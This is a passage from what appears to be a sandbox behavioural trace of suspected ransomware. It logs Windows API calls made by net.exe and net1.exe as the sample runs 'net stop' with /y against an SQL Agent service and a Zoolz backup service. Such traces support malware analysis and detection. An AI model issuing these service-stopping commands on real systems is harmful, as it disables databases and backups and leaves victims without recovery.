HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0037.819] WriteFile (in: hFile=0x26c, lpBuffer=0x586238*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x14f9c8, lpOverlapped=0x0 | out: lpBuffer=0x586238*, lpNumberOfBytesWritten=0x14f9c8*=0x34, lpOverlapped=0x0) returned 1 [0037.819] LocalFree (hMem=0x586238) returned 0x0 [0037.819] GetFileType (hFile=0x26c) returned 0x3 [0037.819] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x586238 [0037.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x586238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0037.819] WriteFile (in: hFile=0x26c, lpBuffer=0x586238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f9c8, lpOverlapped=0x0 | out: lpBuffer=0x586238*, lpNumberOfBytesWritten=0x14f9c8*=0x2, lpOverlapped=0x0) returned 1 [0037.819] LocalFree (hMem=0x586238) returned 0x0 [0037.819] NetApiBufferFree (Buffer=0x581c78) returned 0x0 [0037.820] NetApiBufferFree (Buffer=0x581c90) returned 0x0 [0037.820] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$ECWDB2 /y" [0037.820] exit (_Code=2) Process: id = "25" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x49914000" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Zoolz 2 ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 93 os_tid = 0xb78 Process: id = "26" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x491fd000" os_pid = "0xb7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0xb74" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Zoolz 2 ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 94 os_tid = 0xb80 [0037.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fa8c | out: lpSystemTimeAsFileTime=0x36fa8c*(dwLowDateTime=0xe0d04ea0, dwHighDateTime=0x1d57a86)) [0037.937] GetCurrentProcessId () returned 0xb7c [0037.937] GetCurrentThreadId () returned 0xb80 [0037.937] GetTickCount () returned 0x11447e9 [0037.937] QueryPerformanceCounter (in: lpPerformanceCount=0x36fa84 | out: lpPerformanceCount=0x36fa84*=15822209812) returned 1 [0037.938] GetModuleHandleA (lpModuleName=0x0) returned 0xa10000 [0037.938] __set_app_type (_Type=0x1) [0037.938] __p__fmode () returned 0x74eb31f4 [0037.938] __p__commode () returned 0x74eb31fc [0037.938] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa1ffe6) returned 0x0 [0037.938] __getmainargs (in: _Argc=0xa29064, _Argv=0xa2906c, _Env=0xa29068, _DoWildCard=0, _StartInfo=0xa29024 | out: _Argc=0xa29064, _Argv=0xa2906c, _Env=0xa29068) returned 0 [0037.938] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0037.938] GetConsoleOutputCP () returned 0x1b5 [0037.938] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa29080 | out: lpCPInfo=0xa29080) returned 1 [0037.938] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.941] sprintf_s (in: _DstBuf=0x36fa44, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0037.941] setlocale (category=0, locale=".437") returned="English_United States.437" [0037.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0037.943] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0037.943] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Zoolz 2 ServiceΓÇ¥ /y" [0037.943] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36f810, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0037.944] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x0, Size=0x86) returned 0x7c3c20 [0037.944] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0037.944] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fa14 | out: Buffer=0x36fa14*=0x7c1c80) returned 0x0 [0037.944] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fa14 | out: Buffer=0x36fa14*=0x7c1c98) returned 0x0 [0037.944] _fileno (_File=0x74eb2900) returned -2 [0037.944] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0037.944] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0037.944] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0037.944] _wcsicmp (_String1="config", _String2="stop") returned -16 [0037.944] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0037.944] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0037.944] _wcsicmp (_String1="file", _String2="stop") returned -13 [0037.944] _wcsicmp (_String1="files", _String2="stop") returned -13 [0037.944] _wcsicmp (_String1="group", _String2="stop") returned -12 [0037.944] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0037.944] _wcsicmp (_String1="help", _String2="stop") returned -11 [0037.944] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0037.944] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0037.944] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0037.944] _wcsicmp (_String1="session", _String2="stop") returned -15 [0037.944] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0037.944] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0037.944] _wcsicmp (_String1="share", _String2="stop") returned -12 [0037.945] _wcsicmp (_String1="start", _String2="stop") returned -14 [0037.945] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0037.945] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0037.945] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0037.945] _wcsicmp (_String1="accounts", _String2="ΓÇ£Zoolz") returned -850 [0037.945] _wcsicmp (_String1="computer", _String2="ΓÇ£Zoolz") returned -848 [0037.945] _wcsicmp (_String1="config", _String2="ΓÇ£Zoolz") returned -848 [0037.945] _wcsicmp (_String1="continue", _String2="ΓÇ£Zoolz") returned -848 [0037.945] _wcsicmp (_String1="cont", _String2="ΓÇ£Zoolz") returned -848 [0037.945] _wcsicmp (_String1="file", _String2="ΓÇ£Zoolz") returned -845 [0037.945] _wcsicmp (_String1="files", _String2="ΓÇ£Zoolz") returned -845 [0037.945] _wcsicmp (_String1="group", _String2="ΓÇ£Zoolz") returned -844 [0037.945] _wcsicmp (_String1="groups", _String2="ΓÇ£Zoolz") returned -844 [0037.945] _wcsicmp (_String1="help", _String2="ΓÇ£Zoolz") returned -843 [0037.945] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Zoolz") returned -843 [0037.945] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Zoolz") returned -839 [0037.945] _wcsicmp (_String1="pause", _String2="ΓÇ£Zoolz") returned -835 [0037.945] _wcsicmp (_String1="session", _String2="ΓÇ£Zoolz") returned -832 [0037.945] _wcsicmp (_String1="sessions", _String2="ΓÇ£Zoolz") returned -832 [0037.945] _wcsicmp (_String1="sess", _String2="ΓÇ£Zoolz") returned -832 [0037.945] _wcsicmp (_String1="share", _String2="ΓÇ£Zoolz") returned -832 [0037.945] _wcsicmp (_String1="start", _String2="ΓÇ£Zoolz") returned -832 [0037.945] _wcsicmp (_String1="stats", _String2="ΓÇ£Zoolz") returned -832 [0037.945] _wcsicmp (_String1="statistics", _String2="ΓÇ£Zoolz") returned -832 [0037.945] _wcsicmp (_String1="stop", _String2="ΓÇ£Zoolz") returned -832 [0037.945] _wcsicmp (_String1="time", _String2="ΓÇ£Zoolz") returned -831 [0037.945] _wcsicmp (_String1="user", _String2="ΓÇ£Zoolz") returned -830 [0037.945] _wcsicmp (_String1="users", _String2="ΓÇ£Zoolz") returned -830 [0037.945] _wcsicmp (_String1="msg", _String2="ΓÇ£Zoolz") returned -838 [0037.945] _wcsicmp (_String1="messenger", _String2="ΓÇ£Zoolz") returned -838 [0037.945] _wcsicmp (_String1="receiver", _String2="ΓÇ£Zoolz") returned -833 [0037.946] _wcsicmp (_String1="rcv", _String2="ΓÇ£Zoolz") returned -833 [0037.946] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Zoolz") returned -837 [0037.946] _wcsicmp (_String1="redirector", _String2="ΓÇ£Zoolz") returned -833 [0037.946] _wcsicmp (_String1="redir", _String2="ΓÇ£Zoolz") returned -833 [0037.946] _wcsicmp (_String1="rdr", _String2="ΓÇ£Zoolz") returned -833 [0037.946] _wcsicmp (_String1="workstation", _String2="ΓÇ£Zoolz") returned -828 [0037.946] _wcsicmp (_String1="work", _String2="ΓÇ£Zoolz") returned -828 [0037.946] _wcsicmp (_String1="wksta", _String2="ΓÇ£Zoolz") returned -828 [0037.946] _wcsicmp (_String1="prdr", _String2="ΓÇ£Zoolz") returned -835 [0037.946] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Zoolz") returned -847 [0037.946] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Zoolz") returned -839 [0037.946] _wcsicmp (_String1="server", _String2="ΓÇ£Zoolz") returned -832 [0037.946] _wcsicmp (_String1="svr", _String2="ΓÇ£Zoolz") returned -832 [0037.946] _wcsicmp (_String1="srv", _String2="ΓÇ£Zoolz") returned -832 [0037.946] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Zoolz") returned -839 [0037.946] _wcsicmp (_String1="alerter", _String2="ΓÇ£Zoolz") returned -850 [0037.946] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Zoolz") returned -837 [0037.946] _wcsicmp (_String1="accounts", _String2="2") returned 47 [0037.946] _wcsicmp (_String1="computer", _String2="2") returned 49 [0037.946] _wcsicmp (_String1="config", _String2="2") returned 49 [0037.946] _wcsicmp (_String1="continue", _String2="2") returned 49 [0037.946] _wcsicmp (_String1="cont", _String2="2") returned 49 [0037.946] _wcsicmp (_String1="file", _String2="2") returned 52 [0037.946] _wcsicmp (_String1="files", _String2="2") returned 52 [0037.946] _wcsicmp (_String1="group", _String2="2") returned 53 [0037.946] _wcsicmp (_String1="groups", _String2="2") returned 53 [0037.946] _wcsicmp (_String1="help", _String2="2") returned 54 [0037.946] _wcsicmp (_String1="helpmsg", _String2="2") returned 54 [0037.946] _wcsicmp (_String1="localgroup", _String2="2") returned 58 [0037.946] _wcsicmp (_String1="pause", _String2="2") returned 62 [0037.947] _wcsicmp (_String1="session", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="sessions", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="sess", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="share", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="start", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="stats", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="statistics", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="stop", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="time", _String2="2") returned 66 [0037.947] _wcsicmp (_String1="user", _String2="2") returned 67 [0037.947] _wcsicmp (_String1="users", _String2="2") returned 67 [0037.947] _wcsicmp (_String1="msg", _String2="2") returned 59 [0037.947] _wcsicmp (_String1="messenger", _String2="2") returned 59 [0037.947] _wcsicmp (_String1="receiver", _String2="2") returned 64 [0037.947] _wcsicmp (_String1="rcv", _String2="2") returned 64 [0037.947] _wcsicmp (_String1="netpopup", _String2="2") returned 60 [0037.947] _wcsicmp (_String1="redirector", _String2="2") returned 64 [0037.947] _wcsicmp (_String1="redir", _String2="2") returned 64 [0037.947] _wcsicmp (_String1="rdr", _String2="2") returned 64 [0037.947] _wcsicmp (_String1="workstation", _String2="2") returned 69 [0037.947] _wcsicmp (_String1="work", _String2="2") returned 69 [0037.947] _wcsicmp (_String1="wksta", _String2="2") returned 69 [0037.947] _wcsicmp (_String1="prdr", _String2="2") returned 62 [0037.947] _wcsicmp (_String1="devrdr", _String2="2") returned 50 [0037.947] _wcsicmp (_String1="lanmanworkstation", _String2="2") returned 58 [0037.947] _wcsicmp (_String1="server", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="svr", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="srv", _String2="2") returned 65 [0037.947] _wcsicmp (_String1="lanmanserver", _String2="2") returned 58 [0037.947] _wcsicmp (_String1="alerter", _String2="2") returned 47 [0037.947] _wcsicmp (_String1="netlogon", _String2="2") returned 60 [0037.947] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0037.948] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.948] wcscpy_s (in: _Destination=0x36f514, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0037.948] LoadLibraryW (lpLibFileName="neth.dll") returned 0x73ef0000 [0037.949] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x36f510, nSize=0x0, Arguments=0x36f50c | out: lpBuffer="嘠|neth.dll") returned 0xff [0037.950] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0037.950] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.950] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0037.950] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0037.950] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0037.950] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.950] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0037.950] _wcsicmp (_String1="CONT", _String2="ΓÇ£Zoolz") returned -848 [0037.950] _wcsicmp (_String1="CONT", _String2="2") returned 49 [0037.951] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0037.951] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.951] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0037.951] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.951] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0037.951] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.951] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0037.951] _wcsicmp (_String1="FILES", _String2="ΓÇ£Zoolz") returned -845 [0037.951] _wcsicmp (_String1="FILES", _String2="2") returned 52 [0037.951] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0037.951] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.951] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0037.951] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.951] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0037.951] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.951] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0037.951] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Zoolz") returned -844 [0037.951] _wcsicmp (_String1="GROUPS", _String2="2") returned 53 [0037.951] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0037.951] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.951] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0037.951] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.951] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0037.951] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.951] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0037.951] _wcsicmp (_String1="REPL", _String2="ΓÇ£Zoolz") returned -833 [0037.951] _wcsicmp (_String1="REPL", _String2="2") returned 64 [0037.951] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0037.951] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0037.951] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.951] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0037.951] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Zoolz") returned -833 [0037.951] _wcsicmp (_String1="REPLICATOR", _String2="2") returned 64 [0037.952] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0037.952] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.952] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0037.952] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.952] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0037.952] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.952] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0037.952] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Zoolz") returned -832 [0037.952] _wcsicmp (_String1="SESSIONS", _String2="2") returned 65 [0037.952] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0037.952] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0037.952] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.952] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0037.952] _wcsicmp (_String1="SESS", _String2="ΓÇ£Zoolz") returned -832 [0037.952] _wcsicmp (_String1="SESS", _String2="2") returned 65 [0037.952] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0037.952] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.952] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0037.952] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.952] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0037.952] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.952] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0037.952] _wcsicmp (_String1="STATS", _String2="ΓÇ£Zoolz") returned -832 [0037.952] _wcsicmp (_String1="STATS", _String2="2") returned 65 [0037.952] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0037.952] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.952] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0037.952] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.952] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0037.952] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.952] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0037.952] _wcsicmp (_String1="USERS", _String2="ΓÇ£Zoolz") returned -830 [0037.952] _wcsicmp (_String1="USERS", _String2="2") returned 67 [0037.953] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0037.953] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.953] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0037.953] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.953] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0037.953] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.953] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0037.953] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Zoolz") returned -833 [0037.953] _wcsicmp (_String1="REDIRECTOR", _String2="2") returned 64 [0037.953] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0037.953] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0037.953] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.953] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0037.953] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Zoolz") returned -833 [0037.953] _wcsicmp (_String1="REDIR", _String2="2") returned 64 [0037.953] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0037.953] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0037.953] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.953] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0037.953] _wcsicmp (_String1="RDR", _String2="ΓÇ£Zoolz") returned -833 [0037.953] _wcsicmp (_String1="RDR", _String2="2") returned 64 [0037.953] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0037.953] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0037.953] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.953] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0037.953] _wcsicmp (_String1="WORK", _String2="ΓÇ£Zoolz") returned -828 [0037.953] _wcsicmp (_String1="WORK", _String2="2") returned 69 [0037.953] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0037.953] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0037.953] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.953] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0037.953] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Zoolz") returned -828 [0037.954] _wcsicmp (_String1="WKSTA", _String2="2") returned 69 [0037.954] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0037.954] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0037.954] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.954] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0037.954] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Zoolz") returned -835 [0037.954] _wcsicmp (_String1="PRDR", _String2="2") returned 62 [0037.954] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0037.954] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0037.954] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.954] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0037.954] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Zoolz") returned -847 [0037.954] _wcsicmp (_String1="DEVRDR", _String2="2") returned 50 [0037.954] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0037.954] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.954] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0037.954] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.954] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0037.954] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.954] _wcsicmp 